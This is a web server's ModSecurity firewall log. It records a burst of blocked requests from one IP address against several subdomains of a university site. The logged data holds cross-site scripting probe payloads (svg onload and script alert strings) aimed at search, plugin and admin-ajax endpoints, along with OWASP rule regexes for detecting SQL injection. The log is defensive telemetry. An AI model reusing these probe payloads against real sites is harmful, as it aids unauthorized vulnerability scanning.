[Tue Aug 29 11:51:51.616497 2023] [:error] [pid 2548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS_NAMES:user_password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: user_password found within ARGS_NAMES:user_password: user_password"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/login/dologin"] [unique_id "ZO15Z8Co-f0AAAn0GX0AAAAa"]
[Tue Aug 29 11:51:51.617595 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:key: '>\\x22<svg/onload=confirm('xss')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO15Z8Co-f0AAAnIlkwAAAAV"]
[Tue Aug 29 11:51:51.635858 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:key: '>\\x22<svg/onload=confirm('xss')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO15Z8Co-f0AAAlUlmgAAAA0"]
[Tue Aug 29 11:51:51.635869 2023] [:error] [pid 2527] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:key: '>\\x22<svg/onload=confirm('xss')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO15Z8Co-f0AAAnf3m8AAAAM"]
[Tue Aug 29 11:51:51.638601 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS_NAMES:user_password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: user_password found within ARGS_NAMES:user_password: user_password"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/login/dologin"] [unique_id "ZO15Z8Co-f0AAAmQ-2EAAAAb"]
[Tue Aug 29 11:51:51.657702 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:key: '>\\x22<svg/onload=confirm('xss')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO15Z8Co-f0AAAmQ-2IAAAAb"]
[Tue Aug 29 11:51:51.658918 2023] [:error] [pid 2555] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:key: '>\\x22<svg/onload=confirm('xss')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO15Z8Co-f0AAAn7xugAAAAB"]
[Tue Aug 29 11:51:52.582749 2023] [:error] [pid 2538] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:key: '>\\x22<svg/onload=confirm('xss')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO15aMCo-f0AAAnqj88AAAAC"]
[Tue Aug 29 11:51:52.646424 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS_NAMES:user_password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: user_password found within ARGS_NAMES:user_password: user_password"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/login/dologin"] [unique_id "ZO15aMCo-f0AAAlUlm4AAAA0"]
[Tue Aug 29 11:51:53.583875 2023] [:error] [pid 2555] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchstring. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22</ found within ARGS:searchstring: '>\\x22</script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/search.htm"] [unique_id "ZO15acCo-f0AAAn7xu8AAAAB"]
[Tue Aug 29 11:51:53.892154 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchstring. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22</ found within ARGS:searchstring: '>\\x22</script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/search.htm"] [unique_id "ZO15acCo-f0AAAn40w8AAAAW"]
[Tue Aug 29 11:51:53.904862 2023] [:error] [pid 2529] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:size. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:size: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/parsi-font/css.php"] [unique_id "ZO15acCo-f0AAAnh6NsAAAAS"]
[Tue Aug 29 11:51:53.914141 2023] [:error] [pid 2528] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchstring. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22</ found within ARGS:searchstring: '>\\x22</script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/search.htm"] [unique_id "ZO15acCo-f0AAAngCWMAAAAP"]
[Tue Aug 29 11:51:53.917153 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchstring. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22</ found within ARGS:searchstring: '>\\x22</script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/search.htm"] [unique_id "ZO15acCo-f0AAAlUlnIAAAA0"]
[Tue Aug 29 11:51:53.918514 2023] [:error] [pid 2555] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:size. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:size: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/parsi-font/css.php"] [unique_id "ZO15acCo-f0AAAn7xvAAAAAB"]
[Tue Aug 29 11:51:53.922585 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchstring. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22</ found within ARGS:searchstring: '>\\x22</script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/search.htm"] [unique_id "ZO15acCo-f0AAAn40xAAAAAW"]
[Tue Aug 29 11:51:53.928525 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:size. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:size: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/parsi-font/css.php"] [unique_id "ZO15acCo-f0AAAfWOJMAAAAL"]
[Tue Aug 29 11:51:53.931474 2023] [:error] [pid 2532] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:size. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:size: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/parsi-font/css.php"] [unique_id "ZO15acCo-f0AAAnkwcgAAAAY"]
[Tue Aug 29 11:51:53.992266 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:size. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:size: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/parsi-font/css.php"] [unique_id "ZO15acCo-f0AAAnd3CMAAAAI"]
[Tue Aug 29 11:51:54.596807 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchstring. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22</ found within ARGS:searchstring: '>\\x22</script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/search.htm"] [unique_id "ZO15asCo-f0AAAnIllgAAAAV"]
[Tue Aug 29 11:51:54.605757 2023] [:error] [pid 2526] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:size. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:size: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/parsi-font/css.php"] [unique_id "ZO15asCo-f0AAAnepQUAAAAK"]
[Tue Aug 29 11:51:54.627467 2023] [:error] [pid 2502] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:message. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:message: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15asCo-f0AAAnGkMIAAAAR"]
[Tue Aug 29 11:51:55.715508 2023] [:error] [pid 2548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:message. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:message: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15a8Co-f0AAAn0GYsAAAAa"]
[Tue Aug 29 11:51:55.723796 2023] [:error] [pid 2528] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:table. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:table: event</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO15a8Co-f0AAAngCWcAAAAP"]
[Tue Aug 29 11:51:55.723914 2023] [:error] [pid 2534] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:table. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:table: event</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO15a8Co-f0AAAnmT4sAAAAd"]
[Tue Aug 29 11:51:55.733812 2023] [:error] [pid 2532] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:table. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:table: event</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO15a8Co-f0AAAnkwcsAAAAY"]
[Tue Aug 29 11:51:55.816535 2023] [:error] [pid 2440] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:message. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:message: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15a8Co-f0AAAmIbTYAAAAo"]
